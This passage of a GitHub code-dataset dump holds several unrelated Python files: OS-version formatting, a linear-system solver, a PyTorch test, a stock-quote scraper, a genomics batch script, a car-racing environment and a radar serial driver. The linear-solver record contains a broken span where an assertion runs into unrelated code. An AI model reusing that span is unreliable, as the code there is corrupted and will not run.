0:\n vendor = ext[4:vendor_end]\n ext_name = ext\n if vendor and ext_name:\n href = khronos_extension_base_url + '/%s/%s.txt' % (vendor, ext_name)\n return tag_a(name, title=title, href=href)\n\ndef format_version_number(num):\n if 
isinstance(num, str) or isinstance(num, unicode):\n try:\n num = int(num)\n except ValueError:\n num = None\n if num is None: return 'None'\n m, n, o, p = (num >> 48) & 0xffff, (num >> 32) & 0xffff, (num >> 16) & 0xffff, (num >> 0) & 0xffff\n return '%i.%i.%i.%i' % (m, n, o, p)\n\ndef format_platform_type(platform_type):\n if platform_type is None:\n return _('Platform unknown')\n elif platform_type == 'Linux':\n return tag_a('Linux', href='https://en.wikipedia.org/wiki/Linux')\n elif platform_type == 'Windows NT':\n return tag_a('Windows NT',href='https://en.wikipedia.org/wiki/Windows_NT')\n elif platform_type == 'Windows':\n return tag_a('Windows', href='https://en.wikipedia.org/wiki/Microsoft_Windows')\n else:\n return tag_a(platform_type, href='https://en.wikipedia.org/wiki/Special:Search/' + str(platform_type))\n\ndef _get_version_digit(s):\n i = -1\n for j, c in enumerate(s):\n if not str.isnumeric(c):\n i = j\n break\n if i > 0:\n s = s[0:i]\n ret = None\n try:\n ret = int(s)\n except ValueError:\n pass\n return ret\n\ndef _get_version_from_string(number_str):\n elems = number_str.split('.')\n major = 0\n minor = 0\n patch = 0\n build = 0\n if len(elems) >= 1:\n major = _get_version_digit(elems[0])\n if len(elems) >= 2:\n minor = _get_version_digit(elems[1])\n if len(elems) >= 3:\n patch = _get_version_digit(elems[2])\n if len(elems) >= 4:\n build = _get_version_digit(elems[3])\n return major, minor, patch, build\n\ndef _get_version_from_numbers(os_version_number, os_build_number):\n #print('_get_version_from_numbers %s, %s' % (os_version_number, os_build_number))\n if isinstance(os_version_number, int):\n major = os_version_number >> 48 & 0xffff\n minor = os_version_number >> 32 & 0xffff\n patch = os_version_number >> 16 & 0xffff\n build = os_version_number & 0xffff\n if build == 0 and os_build_number:\n build = int(os_build_number) if os_build_number is not None else 0\n else:\n major, minor, patch, build = _get_version_from_string(os_version_number)\n #print('%x, %s -> %i.%i.%i.%i' % (os_version_number, os_build_number, major, minor, patch, build))\n return major, minor, patch, build\n\ndef get_os_version_number(platform_type, os_version_number, os_build_number):\n if platform_type is None or os_version_number is None:\n return 0\n if platform_type == 'Linux':\n major, minor, patch, build = _get_version_from_string(os_version_number)\n elif platform_type == 'Windows NT':\n major, minor, patch, build = _get_version_from_string(os_version_number)\n if major >= 10:\n build = patch\n patch = 0\n else:\n major = 0\n minor = 0\n patch = 0\n build = 0\n ret = (major << 48) | (minor << 32) | (patch << 16) | build\n #print('ver in %s -> %x' % (os_version_number, ret))\n return ret\n\ndef get_os_build_number(platform_type, os_version_number, os_build_number):\n if platform_type is None or os_version_number is None:\n return 0\n if platform_type == 'Linux':\n build = 0\n elif platform_type == 'Windows NT':\n major, minor, patch, build = _get_version_from_string(os_version_number)\n if major >= 10:\n build = patch\n else:\n build = 0\n #print('build in %s -> %x' % (os_version_number, build))\n return build\n\ndef os_version_info(platform_type, os_version_number, os_build_number):\n ret = {'text': 'unknown' }\n if platform_type is None or os_version_number is None:\n return ret\n major, minor, patch, build = _get_version_from_numbers(os_version_number, os_build_number)\n if platform_type == 'Linux':\n ret['text'] = 'Linux %i.%i.%i.%i' % (major, minor, patch, build)\n ret['href'] = 
'https://en.wikipedia.org/wiki/Linux'\n elif platform_type == 'Windows NT':\n productName = 'Windows %i.%i' % (major, minor)\n marketingName = None\n if (major < 6):\n productName = \"Windows XP\"\n ret['short'] = 'WinXP'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_XP'\n elif (major == 6 and minor == 0):\n productName = \"Windows Vista\"\n ret['short'] = 'WinVista'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_Vista'\n elif (major == 6 and minor == 1):\n productName = \"Windows 7\"\n ret['short'] = 'Win7'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_7'\n elif (major == 6 and minor == 2):\n productName = \"Windows 8\"\n ret['short'] = 'Win8'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_8'\n elif (major == 6 and minor == 3):\n productName = \"Windows 8.1\"\n ret['short'] = 'Win8.1'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_8'\n elif (major == 10):\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_10'\n # See https://en.wikipedia.org/wiki/Windows_10_version_history\n if build <= 10240:\n ret['short'] = 'Win10'\n productName = \"Windows 10\"\n marketingName = ''\n elif(build <= 10586):\n ret['short'] = 'Win10/1511'\n productName = \"Windows 10 Version 1511\"\n marketingName = \"November Update\"\n elif (build <= 14393):\n ret['short'] = 'Win10/1607'\n productName = \"Windows 10 Version 1607\"\n marketingName = \"Anniversary Update\"\n elif (build <= 15063):\n ret['short'] = 'Win10/1703'\n productName = \"Windows 10 Version 1703\"\n marketingName = \"Creators Update\"\n elif (build <= 16299):\n ret['short'] = 'Win10/1709'\n productName = \"Windows 10 Version 1709\"\n marketingName = \"Fall Creators Update\"\n elif (build <= 17134):\n ret['short'] = 'Win10/1803'\n productName = \"Windows 10 Version 1803\"\n marketingName = \"April 2018 Update\"\n elif (build <= 18204):\n ret['short'] = 'Win10/1809'\n productName = \"Windows 10 Version 1809\"\n marketingName = \"October 2018 Update\"\n elif (build <= 18362):\n ret['short'] = 'Win10/1903'\n productName = \"Windows 10 Version 1903\"\n marketingName = \"May 2019 Update\"\n elif (build <= 18363):\n ret['short'] = 'Win10/1909'\n productName = \"Windows 10 Version 1909\"\n marketingName = \"November 2019 Update\"\n elif (build <= 19041):\n ret['short'] = 'Win10/2004'\n productName = \"Windows 10 Version 2004\"\n marketingName = \"May 2020 Update\"\n elif (build <= 19042):\n ret['short'] = 'Win10/20H2'\n productName = \"Windows 10 Version 20H2\"\n marketingName = '20H2'\n elif (build <= 19043):\n ret['short'] = 'Win10/21H1'\n productName = \"Windows 10 Version 21H1\"\n marketingName = '21H1'\n elif (build <= 19044):\n ret['short'] = 'Win10/21H2'\n productName = \"Windows 10 Version 21H2\"\n marketingName = '21H2'\n elif (build <= 19045):\n ret['short'] = 'Win10/22H2'\n productName = \"Windows 10 Version 22H2\"\n marketingName = '22H2'\n else:\n ret['short'] = 'Win10/TBA'\n productName = 'Windows 10 Build %i' % build\n elif (major == 11):\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_11'\n # See https://en.wikipedia.org/wiki/Windows_11_version_history\n if (build <= 22000):\n ret['short'] = 'Win11/21H2'\n productName = \"Windows 11 Version 21H2\"\n marketingName = '21H2'\n elif (build <= 22621):\n ret['short'] = 'Win11/22H2'\n productName = \"Windows 11 Version 22H2\"\n marketingName = '21H2'\n else:\n ret['short'] = 'Win11/TBA'\n productName = 'Windows 11 Build %i' % build\n if marketingName:\n ret['text'] = '%s (%s)' % (productName, marketingName)\n else:\n ret['text'] = productName\n 
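# (Hedged worked example, not from the original source: the helper above packs
# major/minor/patch/build into four 16-bit fields, so for platform_type
# 'Windows NT' with the packed value 0x000A000000004A63 -- major=10, minor=0,
# patch=0, build=19043 (0x4A63) -- the branches above yield
# short='Win10/21H1' and text='Windows 10 Version 21H1 (21H1)'.)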
ret['full'] = ret['text'] + ' %i.%i.%i.%i' % (major, minor, patch, build)\n\n elif platform_type == 'Windows':\n ret['text'] = 'Windows %i.%i' % (major, minor)\n ret['href'] = 'https://en.wikipedia.org/wiki/Microsoft_Windows'\n return ret\n\ndef format_os_version(platform_type, os_version_number, os_build_number):\n info = os_version_info(platform_type, os_version_number, os_build_number)\n if 'href' in info:\n return tag_a(info.get('text'), href=info.get('href'))\n else:\n return info.get('text')\n\ndef format_os_version_short(platform_type, os_version_number, os_build_number):\n info = os_version_info(platform_type, os_version_number, os_build_number)\n if 'short' in info:\n return info.get('short')\n else:\n return info.get('text')\n\ndef language_from_qlocale_language_enum(num):\n _codes = {\n 0: 'Any language',\n 31: 'English',\n 42: 'German',\n }\n if num in _codes:\n return _codes[num]\n else:\n return str(num)\n\n# See https://doc.qt.io/qt-5/qlocale.html#Country-enum\ndef country_from_qlocale_country_enum(num):\n _codes = {\n 0: 'Any country',\n 82: 'Germany',\n 224: 'United Kingdom',\n 225: 'United States',\n }\n if num in _codes:\n return _codes[num]\n else:\n return str(num)\n\n# https://doc.qt.io/qt-5/qlocale.html#Script-enum\ndef script_from_qlocale_script_enum(num):\n _codes = {\n 0: 'Any script',\n 1: 'Arabic',\n 2: 'Cyrillic',\n 16: 'Greek',\n 7: 'Latin',\n }\n if num in _codes:\n return _codes[num]\n else:\n return str(num)\n\ndef thread_extra_info(thread):\n if thread is None:\n return _('N/A')\n elif thread.main_thread:\n return '*@' if thread.exception else '@'\n elif thread.rpc_thread:\n return '*[RPC]' if thread.exception else '[RPC]'\n elif thread.exception:\n return '*'\n else:\n return ''\n\ndef format_thread(thread):\n if thread is None:\n return _('N/A')\n else:\n if thread.main_thread:\n ret = _('Main thread')\n elif thread.rpc_thread:\n ret = _('RPC thread')\n else:\n ret = _('Thread')\n ret = ret + ' ' + hex_format(thread.id)\n if thread.name:\n ret = ret + ' ' + thread.name\n if thread.exception:\n ret = ret + ' ' + _('with exception')\n return ret\n\ndef format_stack_frame(frame):\n if frame is None:\n return _('N/A')\n else:\n if frame.function is None:\n offset = frame.addr - frame.module_base\n if frame.module:\n return frame.module + '+' + hex_format(offset)\n else:\n return frame.addr\n else:\n return format_function_plus_offset(frame.function, frame.funcoff)\n\nif __name__ == '__main__':\n x = _get_version_from_string(\"6.1 Service Pack 1\")\n print(x)","repo_name":"aroth-arsoft/arsoft-web-crashupload","sub_path":"app/crashdump/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":25830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16266555557","text":"import numpy as np\n\ndef BackSub(aug_matrix,x):\n \"\"\"back substitute a N by N system after Gauss elimination\n\n Args:\n aug_matrix: augmented matrix with zeros below the diagonal\n x: length N vector to hold solution\n Returns:\n nothing\n Side Effect:\n x now contains solution\n \"\"\"\n N = x.size\n for row in range(N-1,-1,-1):\n RHS = aug_matrix[row,N]\n for column in range(row+1,N):\n RHS -= x[column]*aug_matrix[row,column]\n x[row] = RHS/aug_matrix[row,row]\n return\ndef swap_rows(A, a, b):\n \"\"\"Rows two rows in a matrix, switch row a with row b\n \n args: \n A: matrix to perform row swaps on\n a: row index of matrix\n b: row index of matrix\n \n returns: nothing\n \n side effects:\n changes A to rows a and b 
swapped\n    \"\"\"\n    assert (a>=0) and (b>=0)\n    N = A.shape[0] #number of rows\n    assert (a0):\n            A[i,i-1] = -0.5*(D(r)+D(r-Delta_r))/(Delta_r * V[i])*S[i] \n            A[i,i] += 0.5/(Delta_r * V[i])*((D(r)+D(r-Delta_r))*S[i])\n            A[i,i+1] = -0.5*(D(r)+D(r+Delta_r))/(Delta_r * V[i])*S[i+1]\n            b[i] = Q(r)\n        \n        #solve system\n        phi = GaussElimPivotSolve(A,b)\n        #remove last element of phi because it is outside the domain\n        phi = phi[0:I]\n        return centers, phi\n    \n\n","repo_name":"DrRyanMc/CompNucEng","sub_path":"ch18.py","file_name":"ch18.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"}
{"seq_id":"11995142220","text":"# to hold tests\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torchsummary import summary\n\nfrom utils import visualize_vid, visualize_waveform, to_categorical\nfrom gen_synthetic import DataGen\nfrom models import ConvNet3D\n\ndef test_model():\n\n    no_classes = 76\n    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n    learning_rate = 0.001\n\n    input = torch.randn(200, 1, 60, 25, 25, requires_grad=True).to(device)\n    target = torch.empty(200, dtype=torch.long).random_(no_classes).to(device)\n\n    # https://stackoverflow.com/questions/62456558/is-one-hot-encoding-required-for-using-pytorchs-cross-entropy-loss-function\n    # doesn't need one hot encoding if using categorical cross entropy loss\n    # if want to use target as one hot vector then need to use nn.functional.log_softmax + nn.NLLLoss\n    #target = to_categorical(target, no_classes)\n    #target = torch.from_numpy(target).to(device)\n    #print(input, target)\n    print(target)\n    #print(target[0])\n\n    model = ConvNet3D(no_classes).to(device)\n    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n    criterion = nn.CrossEntropyLoss()\n    print(model)\n    summary(model, input_size=(1, 60, 25, 25))\n    \n    for i in range(1000):\n        #input.to(device)\n        #target.to(device)\n        # Forward pass\n        outputs = model(input)\n        #print(outputs, outputs.size)\n        loss = criterion(outputs, target)\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n        if i%100==0:\n            print(loss)\n\ndef test_visualize_vid():\n    cap = cv2.VideoCapture(\"/home2/edwin_ed520/databases/UBFC_og_14sub/S13.avi\")\n    vid = []\n    while cap.isOpened():\n        ret, frame = cap.read()\n        if ret == False: break\n        vid.append(frame)\n    vid = np.array(vid)\n    visualize_vid(vid)\n\ndef test_datagen():\n    datagenerator = DataGen(heart_rate_high=90, no_videos_by_class=2)\n    x, y = datagenerator.gen_signal()\n    #print(x.shape, y.shape)\n    #print(x[0])\n    #print(y[0])\n    visualize_vid(x)\n\n#test_visualize_vid()\n#test_datagen()\ntest_model()","repo_name":"zhujiangzhijia/rppg_3dcnn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"9540563041","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep  2 14:58:03 2019\n\n@author: elliott\n\"\"\"\n#This program uses a regular expression in the parser function to \n#find all of the capitalized words. It then sends those words to the \n#bayesCheck function and runs a simplified naive bayes function to \n#further prune the words most-likely to be names. 
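#
#A rough sketch of the scoring rule described above (illustrative only; the
#real logic lives in bayesCheck below, which awards one point per passed test
#and drops words scoring 3 or less):
#
#    def keeps(word, words):
#        score = sum([word[0].isupper(), len(words) > 1,
#                     len(word) > 3, len(word) < 9])
#        return score > 3  # a word needs all four points to survive
#
#    keeps('Alice', ['Alice', 'ran'])  # True  -> likely a name
#    keeps('ran', ['Alice', 'ran'])    # False -> pruned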
\n\nimport re\n\n\ndef parser(lineNum, string):\n ans = re.findall( '[a-zA-Z]+\\w+', string)\n ans = bayesCheck(ans)\n for i in ans:\n output.write(i + \" \")\n output.write(\"\\n\")\n\ndef bayesCheck(ans):\n rating = 0\n toRemove= []\n if len(ans)>=1:\n for i in ans:\n if i[0].isupper()==True:\n rating+=1\n if len(ans)>1:\n rating+=1\n if len(i)>3:\n rating+=1\n if len(i)<9:\n rating+=1\n if rating<=3:\n toRemove.append(i)\n rating = 0\n for i in toRemove:\n ans.remove(i)\n return ans\n\ndef reader(file):\n source = open(file,\"r\")\n line = source.readlines()\n for x in range(10000):\n output.write(str(x+1) + \" \")\n parser(x, line[x])\n\nif __name__ == \"__main__\":\n output = open(\"answer.txt\", \"w+\")\n reader(\"sents_BNCbaby.txt\") \n output.close()\n output = open(\"answer.txt\", \"r\")\n if output.mode == 'r':\n contents = output.read()\n print(contents) \n \n#\n ","repo_name":"ElliottSRose/DataMining","sub_path":"lab2Bayes.py","file_name":"lab2Bayes.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6722129075","text":"def flash(i, j, ocs):\n acc = 1\n for l in range(i-1, i+2):\n for c in range(j-1, j+2):\n if not (l == i and c == j) and 0 <= l < len(ocs) and 0 <= c < len(ocs[0]):\n if ocs[l][c] != 0:\n ocs[l][c] += 1\n\n if ocs[l][c] >= 10:\n ocs[l][c] = 0\n acc += flash(l, c, ocs)\n\n return acc\n\n\ndef synchronized(ocs):\n zeros = [[o == 0 for o in oc] for oc in ocs]\n return all([all(z) for z in zeros])\n\n\nif __name__ == \"__main__\":\n ocs = []\n with open(\"11-dat.txt\") as data:\n for index, line in enumerate(data):\n ocs.append([])\n line = line.replace(\"\\n\", \"\")\n for ch in line:\n ocs[index].append(int(ch))\n\n lines = len(ocs)\n cols = len(ocs[0])\n\n acc = 0\n n = 1\n while True:\n new_ocs = ocs.copy()\n for line in range(lines):\n for col in range(cols):\n new_ocs[line][col] += 1\n\n for line in range(lines):\n for col in range(cols):\n if new_ocs[line][col] >= 10:\n new_ocs[line][col] = 0\n acc += flash(line, col, new_ocs)\n\n ocs = new_ocs\n\n if synchronized(ocs):\n break\n\n n += 1\n\n print(acc)\n print(n)\n\n\n","repo_name":"MiraiKami/AoC2021","sub_path":"11-12/11-12.py","file_name":"11-12.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14219713131","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom app.router.includes import app as router\nfrom app.settings.config import Settings\n\nconfig = Settings()\n\napp = FastAPI(\n description=config.API_DESCRIPTION,\n title=config.API_TITLE,\n version=config.API_VERSION,\n docs_url=config.API_DOC_URL,\n openapi_url=config.API_OPENAPI_URL,\n redoc_url=config.API_REDOC_URL,\n debug=config.DEBUG,\n)\n\napp.include_router(router)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n","repo_name":"yezz123/stripe-template","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"17302466667","text":"from ..model import Quote\nfrom .base import BaseFetcher, FetchError\nfrom bs4 import BeautifulSoup\nimport requests\nimport dateutil.parser\nfrom decimal import Decimal\n\n\nclass BiznesRadar(BaseFetcher):\n @staticmethod\n def 
validUrl(url):\n        return url.startswith(\"https://www.biznesradar.pl/\")\n\n    def __init__(self, url):\n        super(BiznesRadar, self).__init__(url)\n\n    def fetch(self):\n        html = requests.get(self.url).text\n        soup = BeautifulSoup(html, 'html.parser')\n\n        quoteValue = self._getQuote(soup)\n        timestamp = self._getTimestamp(soup)\n        name = self._getName(soup)\n        ticker, alternateName = self._getTicker(soup)\n\n        return Quote(quote = quoteValue, timestamp = timestamp, name = name or alternateName, currency = \"PLN\")\n\n    def _getQuote(self, soup):\n        quoteHtml = soup.find(id=\"pr_t_close\")\n        if not quoteHtml:\n            raise FetchError(self.url, \"Cannot find quote tag\")\n\n        if not quoteHtml.span:\n            raise FetchError(self.url, \"Cannot recognize quote tag's content\")\n\n        return Decimal(quoteHtml.span.string)\n\n    def _getTimestamp(self, soup):\n        timeHtml = soup.find(id=\"pr_t_date\")\n        if not timeHtml:\n            raise FetchError(self.url, \"Cannot find timestamp tag\")\n\n        if not timeHtml.time:\n            raise FetchError(self.url, \"Cannot recognize timestamp tag's content\")\n\n        return dateutil.parser.parse(timeHtml.time['datetime'])\n\n    def _getName(self, soup):\n        headerHtml = soup.find(id=\"fullname-container\")\n\n        if not headerHtml:\n            return None\n\n        if not headerHtml.h2:\n            return None\n\n        return str(headerHtml.h2.string)\n\n    def _getTicker(self, soup):\n        headerHtml = soup.find(id=\"profile-header\")\n        if not headerHtml or not headerHtml.h1:\n            return None, None\n\n        header = str(headerHtml.h1.string)\n        if header.startswith(\"Notowania \"):\n            return header[10:header.find(' ', 10)], None\n        else:\n            return None, header\n","repo_name":"kpk-pl/wallet","sub_path":"web-gui/flaskr/quotes/fetchers/biznesradar.py","file_name":"biznesradar.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"338390551","text":"#!/usr/bin/env python\nsInputBam=\"\"\nsHSmetcisPostBam=\"\"\n\nimport gzip\nimport os, subprocess, glob, time\nimport sys, time, random, re, requests, logging, glob\nimport concurrent.futures\nfrom multiprocessing import Process, Queue, Pool, cpu_count, current_process, Manager\n\n\nlogger=logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nformatter=logging.Formatter(\"%(asctime)s - %(message)s\")\n\nch=logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\n\n\ndef producer_task(q, cosmic_dict):\n\n\tlBamlist=glob.glob(sInputBam+\"/*.bam\")\n\tlPostrecalBam1=glob.glob(sHSmetcisPostBam+\"/AlignmentStatus_*.hs_metrics\")\n\tlPostbam=lPostrecalBam1\n\tlPostID=[]\n\t\n\t\n\tfor sPathFile in lPostbam:\n\t\tsFile=sPathFile.split(\"/\")[-1]\n\t\tsIDBam=sFile.split(\"_\")[1]\n\t\tsID=sIDBam[0:14]\n\t\tlPostID.append(sID)\n\tdTargetTCGA=dict()\n\tfFinal=open(\"/mnt/alpha/leefall2/TCGA_LUAD/mc3/allmc3Barcode.txt\")\n\tfFinal.readline()\n\t\n\t\n\t\n\tfor sLine in fFinal.readlines():\n\t\tsLine=sLine.strip()\n\t\tsTCGAID=sLine.split(\"\\t\")[0]\n\t\t#sFinal.add(t[0])\n\t\tdTargetTCGA[sTCGAID+\"-T\"]=0\n\t\tdTargetTCGA[sTCGAID+\"-N\"]=0\n\tprint(\"All_Bam\")\n\tprint(len(lBamlist))\n\t\n\tsFilelist=[]\n\n\tfor i in lBamlist:\n\t\tsFile=i.split(\"_\")[1]\n\t\tsID=sFile[0:14]\n\t\tif sID in dTargetTCGA:\n\t\t\tif sID in lPostID:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tsFilelist.append(i)\n\n\tprint(\"Non process files\")\n\n\tprint(len(sFilelist))\n\tsFinalFilelist=sFilelist\n\n\tfor i in sFinalFilelist:\n\n\t\tvalue=i\n\t\tcosmic_dict[value]=None\n\n\t\tq.put(value)\n\n\ndef 
consumer_task(q, cosmic_dict):\n\twhile not q.empty():\n\t\tvalue=q.get(True, 0.05)\n\t\tcosmic_dict[value]=\"complete\"\n\n\n\n\nif __name__==\"__main__\":\n\tStartTime=(time.ctime())\n\tdata_queue=Queue()\n\tos.chdir(\"/mnt/Beta/leefall2/TCGA_LUAD/postrecalBam/\")\n#\tnumber_of_cpus=cpu_count()-2\n\tnumber_of_cpus=4\n\tmanager=Manager()\n\tfibo_dict=manager.dict()\n\tproducer=Process(target=producer_task, args=(data_queue, fibo_dict))\n\tproducer.start()\n\tproducer.join()\n\tconsumer_list=[]\n\tprint(\"Number_of_Files_for_process\")\n\tprint(len(fibo_dict))\n\tfor i in range(number_of_cpus):\n\t\tconsumer=Process(target=consumer_task, args=(data_queue,fibo_dict))\n\t\tconsumer.start()\n\t\tconsumer_list.append(consumer)\n\n\t[consumer.join() for consumer in consumer_list]\n\n\n\n\n\n\n\n\n\tprint(\"Start Time\")\n\tprint(StartTime)\n\tprint(\"End Time\")\n\tprint(time.ctime())\n","repo_name":"leefall/NGS","sub_path":"QC/Run_HSmetrics_not_yet.py","file_name":"Run_HSmetrics_not_yet.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39901175404","text":"import numpy as np\n\nMAP_GAS = [-1, 500, 750, 1000, 1250, 1500]\nMAP_TIRE = [-1, 500, 750, 1000, 1250, 1500]\nMAP_HANDLING = [-1, 9, 12, 15, 18, 21]\nMAP_SPEED = [-1, 10, 20, 30, 40, 50]\nMAP_ACCEL = [-1, 10, 15, 20, 25, 30]\nMAP_DECEL = [-1, -10, -15, -20, -25, -30]\n\n\nclass car:\n def __init__(self, csv):\n parsed = np.loadtxt(open(csv, \"rb\"), dtype=int, delimiter=\",\", skiprows=1)\n self.tire = MAP_TIRE[parsed[0]]\n self.gas = MAP_GAS[parsed[1]]\n self.handling = MAP_HANDLING[parsed[2]]\n self.speed = MAP_SPEED[parsed[3]]\n self.acceleration = MAP_ACCEL[parsed[4]]\n self.breaking = MAP_DECEL[parsed[5]]\n\n self.cur_v = 0\n self.cur_gas = self.gas\n self.cur_tire = self.tire\n self.time = 0\n\n def get_state_vector(self):\n return [\n self.cur_v,\n self.cur_gas,\n self.cur_tire,\n self.time\n ]\n\n def car_reset(self):\n self.cur_v = 0\n self.cur_gas = self.gas\n self.cur_tire = self.tire\n self.time = 0\n\n def print_error(self, *args):\n pass\n\n # inst = [acc, pit_stop]\n def evolve(self, radius, inst, cur_position):\n v0 = self.cur_v\n\n if inst[0] > self.acceleration:\n self.print_error(\"ERROR: illegal acceleration value: \", inst[0], cur_position)\n return False, cur_position\n\n if inst[0] < self.breaking:\n self.print_error(\"ERROR: illegal breaking value: \", inst[0], cur_position)\n return False, cur_position\n\n if v0 <= 0 and inst[0] <= 0:\n self.print_error(\"Error: stalling at one point without moving nor acceleration. 
inst:\", inst, cur_position)\n return False, cur_position\n\n # resultant speed positive\n if v0 * v0 + 2 * inst[0] < 0:\n v1 = 0\n else:\n v1 = np.sqrt(v0 * v0 + 2 * inst[0])\n\n # no gas and accelerating\n if self.cur_gas <= 0 and inst[0] > 0:\n self.print_error(\"Error: no gas and accelerating\", self.cur_gas, inst[0], cur_position)\n return False, cur_position\n\n # find vmax\n if radius != -1:\n v_max = np.sqrt(radius * self.handling / 1000000)\n if v0 > v_max or v1 > v_max: # exceeds max\n self.print_error(\"Error: Speed exceeds max\", v0, v1, cur_position)\n return False, cur_position\n\n # pitstop\n if inst[1] == 1:\n # condition 1\n if v0 != 0:\n if v0 * v0 / 2 > np.abs(self.breaking):\n self.print_error(\"Error: pitstop and unable to break (too fast 1)\", cur_position)\n return False, cur_position\n t1 = 2 / v0\n else:\n t1 = 0\n\n # condition 2\n if v1 != 0:\n if v1 * v1 / 2 > self.acceleration:\n self.print_error(\"Error: pitstop and unable to read target velocity (too fast 2)\", cur_position)\n return False, cur_position\n t2 = 2 / v1\n else:\n t2 = 0\n\n # 30 (pitstop time) + t1 + t2\n self.time += 30 + t1 + t2\n\n # restore car conditions\n self.cur_gas = self.gas\n self.cur_tire = self.tire\n else:\n if inst[0] == 0:\n self.time += 1 / v0\n else:\n self.time += (v1 - v0) / inst[0]\n\n self.cur_v = v1\n\n if self.cur_v < 0:\n self.print_error(\"ERROR: negative current velocity:\", self.cur_v, cur_position)\n\n if inst[0] > 0:\n self.cur_gas -= 0.1 * inst[0] ** 2\n elif inst[0] < 0:\n self.cur_gas -= 0.1 * np.abs(inst[0]) ** 2\n\n if self.cur_tire < 0:\n self.print_error(\"Error: tire died\", cur_position)\n return False, cur_position\n\n if inst[1] == 1:\n return True, cur_position + 2\n else:\n return True, cur_position + 1\n","repo_name":"Eric-R-Liang/RL-Racecar-optimizer","sub_path":"qlearning4k/games/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37559909695","text":"\"\"\"\n================================================================================\n * @file \tawr1843.py\n * @author \tMitch Manning - s4532126\n * @date \t22-06-2021\n * @brief \tFunctions which handle communication with the AWR1843 and parsing\n * it's data.\n================================================================================\n\"\"\"\n# Standard\nfrom datetime import datetime\nimport time\nimport sys\n# Non-Standard\nimport numpy as np # 'numpy'\nimport serial as s # 'pyserial'\nfrom serial.tools import list_ports\n# Custom\nfrom jetson_gpio import * \n\n\n# Device Specific\nMAGIC_WORD = '0102030405060708'\nSDK_VERSION = '03050004'\nDEV_PLATFORM = '000A6843'\nOUTPUT_MSG_SEGMENT_LEN = 32\n# TLV Type Indicators\nDPIF_POINT_CLOUD_SPHERICAL = 6\nTARGET_LIST_3D = 7\nTARGET_INDEX = 8\nDPIF_POINT_CLOUD_SIDE_INFO = 9\n# Size of TLV Packets\nSIZE_PKT_HEADER = 52\nSIZE_TLV_HEADER = 8\nSIZE_PC_SPHERICAL = 16\nSIZE_TARGET_LIST = 112\nSIZE_TARGET_INDEX = 1\nSIZE_PC_SIDE_INFO = 4\n# IDs Associated with Error\nID_NOT_ASSOCIATED = [253, 254, 255]\n# Baud Rates\nDATA_BAUD = 921600\nCLI_BAUD = 115200\n# Chirp File Name\nCHIRP_CONF = 'chirp_file.cfg'\n# Transformation Matrices\nWORD_16 = [2**0, 2**8]\nWORD_32 = [2**0, 2**8, 2**16, 2**24]\n\n\ndef init_ports():\n \"\"\"\n @brief Opens the CLI and Data port connection with the AWR1843 device.\n @param None\n @return The port references (empty if uninitialised).\n \"\"\"\n cli_port = {}\n data_port = {}\n com_ports = 
list(list_ports.comports())\n \n # Linux Support\n if sys.platform.startswith('linux'):\n for port in com_ports:\n dev = port[0]\n name = port[1]\n if 'XDS110' in name and '/dev/ttyACM1' in port:\n data_port = s.Serial('/dev/ttyACM1', DATA_BAUD)\n elif 'XDS110' in name and '/dev/ttyACM0' in port:\n cli_port = s.Serial('/dev/ttyACM0', CLI_BAUD)\n\n # Windows Support\n elif sys.platform.startswith('win'):\n for port in com_ports:\n dev = port[0]\n name = port[1]\n if 'XDS110 Class Auxiliary Data Port' in name:\n data_port = s.Serial(dev, DATA_BAUD)\n elif 'XDS110 Class Application/User UART' in name:\n cli_port = s.Serial(dev, CLI_BAUD)\n\n time.sleep(0.1)\n return cli_port, data_port\n\ndef init_config(chirp_filename, cli_port):\n \"\"\"\n @brief Transmits the chirp configuration file to setup the AWR1843.\n @param chirp_filename is the name of the chirp configuration file.\n @param cli_port is the CLI port reference.\n @return None\n \"\"\"\n config_params = [line.rstrip('\\r\\n') for line in open(chirp_filename)]\n for param in config_params:\n cli_port.write((param+'\\n').encode())\n time.sleep(0.01)\n time.sleep(0.1)\n\ndef terminate(error_msg, cli_port, 